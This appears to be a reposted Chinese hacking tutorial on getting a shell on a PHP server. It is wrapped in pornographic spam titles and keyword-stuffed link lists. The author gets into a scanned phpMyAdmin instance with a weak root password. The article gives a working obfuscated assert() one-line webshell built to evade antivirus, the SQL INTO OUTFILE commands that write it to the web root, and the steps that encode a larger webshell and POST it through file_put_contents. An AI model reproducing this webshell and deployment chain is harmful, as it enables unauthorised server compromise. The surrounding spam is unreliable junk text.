成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

解讀木馬GetShell的另類姿勢

安全 黑客攻防
其實吧,之前是想寫一長篇小說的,把整個過程詳細的寫一遍,怕各位看官拍磚,轉了話風 ……

0×00 工欲善其事,必先利其器

其實吧,之前是想寫一長篇小說的,把整個過程詳細的寫一遍,怕各位看官拍磚,轉了話風 ……

[[150544]]

中間件:

XAMPP(能運行PHP程序即可)

‍‍武器:

Chrome瀏覽器、Proxy SwitchySharp代理插件、Advanced REST client插件(核武器)

‍‍函數:

file_put_contents()、urlencode()、urldecode()、php_strip_whitespace() -- PHP函數

0×01 上小馬

掃C段時發現一機器有phpMyAdmin服務,就嘗試了一下弱口令,root123果斷進入,然后就開始了下面的故事。

探測IP為阿里云服務器,普通的一句話木馬一寫入就被殺掉,后改為混淆一句話木馬:

  1. <?php                  
  2. @$_='s'.'s'./*-/*-*/'e'./*-/*-*/'r';                    
  3. @$_=/*-/*-*/'a'./*-/*-*/$_./*-/*-*/'t';                    
  4. @$_/*-/*-*/($/*-/*-*/{'_P'./*-/*-*/'OS'./*-/*-*/'T'}                    
  5. [/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);  
  6. //密碼-7    
  7. ?> 

一句話木馬原形:

  1. assert($_POST[-7]); 

寫入一句話木馬SQL(網站路徑從phpinfo.php獲得,其它姿勢亦可):

  1. use test;  
  2. drop table if exists temp;  
  3. create table temp (cmd text NOT NULL);  
  4. insert into temp (cmd) values("<?php @$_='s'.'s'./*-/*-*/'e'./*-/*-*/'r'; @$_=/*-/*-*/'a'./*-/*-*/$_./*-/*-*/'t'; @$_/*-/*-*/($/*-/*-*/{'_P'./*-/*-*/'OS'./*-/*-*/'T'} [/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?> ");  
  5. select cmd from temp into outfile 'D:/phpStudy/WWW/phpMyAdmin/indxe.php';  
  6. drop table if exists temp; 

木馬GetShell的另類姿勢

 

0×02 處理大馬

解讀木馬GetShell的另類姿勢

 

用菜刀連接一句話木馬,連接上后即提示"連接被重置",估計是屏蔽了本機的出口IP,用VPN、切換代理后同樣的問題還是會即時出現,所以放棄用菜刀上傳webshell,嘗試手工post的方法。

這里需要先確定下服務器上file_put_contents()函數是否執行,可行的話再執行下面的操作。

首先在本地把大馬處理好以便于作為post參數:

用到了strip_whitespace()函數【返回已刪除PHP注釋以及空白字符的源代碼文件】,urlencode()函數【對字符串進行url編碼處理】,file_get_contents()函數【讀取txt文件內容】。

C盤根目錄下需要放一個strip_shell.php文件(待strip_whitespace的php大馬),新建strip.php文件和urlencode.php文件,兩文件內容分別為(注意兩個函數參數):

  1. strip.php:  
  2. <?php  
  3. echo php_strip_whitespace('strip_shell.php');  
  4. ?>  
  5. urlencode.php:  
  6. <?php  
  7. echo urlencode(file_get_contents('urlencode_shell.php'));  
  8. ?> 

執行過程如下(注意文件名稱變化和執行順序):

解讀木馬GetShell的另類姿勢

 

所有文件如下:

解讀木馬GetShell的另類姿勢

 

其中urldecode.php文件為最終處理的文件,文件內容如下:

解讀木馬GetShell的另類姿勢

 

0×03 GetShell

最后請出主角Advanced REST client插件,長這樣:

解讀木馬GetShell的另類姿勢

 

這里只需用到POST方法,上面一句話小馬的密碼為-7,即這里Payload模塊的key為-7,參數重要部分如下:

  1. file_put_contents("D:/phpStudy/WWW/phpMyAdmin/mysqlx.php",urldecode("復制urldecode.php文件所有內容")); 

最后POST表單如下:

解讀木馬GetShell的另類姿勢

 

至此,成功GetShell,有錯誤或好的建議請指正提出。

責任編輯:藍雨淚 來源: FreeBuf
相關推薦

2010-06-28 14:30:08

SQL Server

2010-07-12 15:36:45

SQL Server

2012-11-20 09:49:33

Windows 8操作系統

2013-07-16 14:48:03

大數據大數據技術數據

2019-07-19 10:44:34

移動應用APP

2011-05-11 11:10:10

網游病毒營銷病毒

2017-07-06 09:33:18

AMDEPYC處理器

2015-03-13 09:30:23

iOS內存管理

2010-11-23 11:16:35

MySQL表別名

2009-10-23 17:10:27

試用達人

2011-04-25 13:13:02

Javafinalize

2020-03-10 18:53:16

移動支付另類支付APP

2012-06-15 17:50:26

2013-08-22 17:42:59

2009-03-09 13:59:22

IDC行業

2009-09-09 16:06:08

對象

2014-09-25 09:00:57

2010-09-14 09:28:34

2018-09-21 10:45:54

2018-01-11 15:31:39

命令Linux關機
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 久热精品在线观看视频 | 久久久久久成人 | 中文字幕在线精品 | www.婷婷| 欧美色综合 | 国产精品久久毛片av大全日韩 | 亚洲国产精品一区在线观看 | 精品一区二区三区四区五区 | 有码在线| 亚洲精品一二三区 | 亚洲精品女人久久久 | 美女视频一区 | 成人网址在线观看 | 亚洲 中文 欧美 日韩 在线观看 | 亚洲国产欧美精品 | 国产精品免费一区二区 | 国产精品自产av一区二区三区 | 91精品国产综合久久久久久蜜臀 | 欧美激情a∨在线视频播放 成人免费共享视频 | 一区二区三区在线播放 | 精品综合久久久 | 精品一区二区在线观看 | 亚洲男人网 | 一区二区三区久久久 | 国产中文字幕亚洲 | 久久精品色欧美aⅴ一区二区 | 欧美精品99| 国产视频在线一区二区 | 国产99精品| 欧美男人天堂 | 成人亚洲精品 | 久久久www成人免费精品 | 中文字幕亚洲精品 | 中文字幕日韩一区二区 | 美女视频一区二区三区 | 成人网av | 国产一区二区不卡 | 亚洲一区二区三区免费在线观看 | 一区二区国产在线观看 | 成人欧美| 欧美最猛性xxxxx亚洲精品 |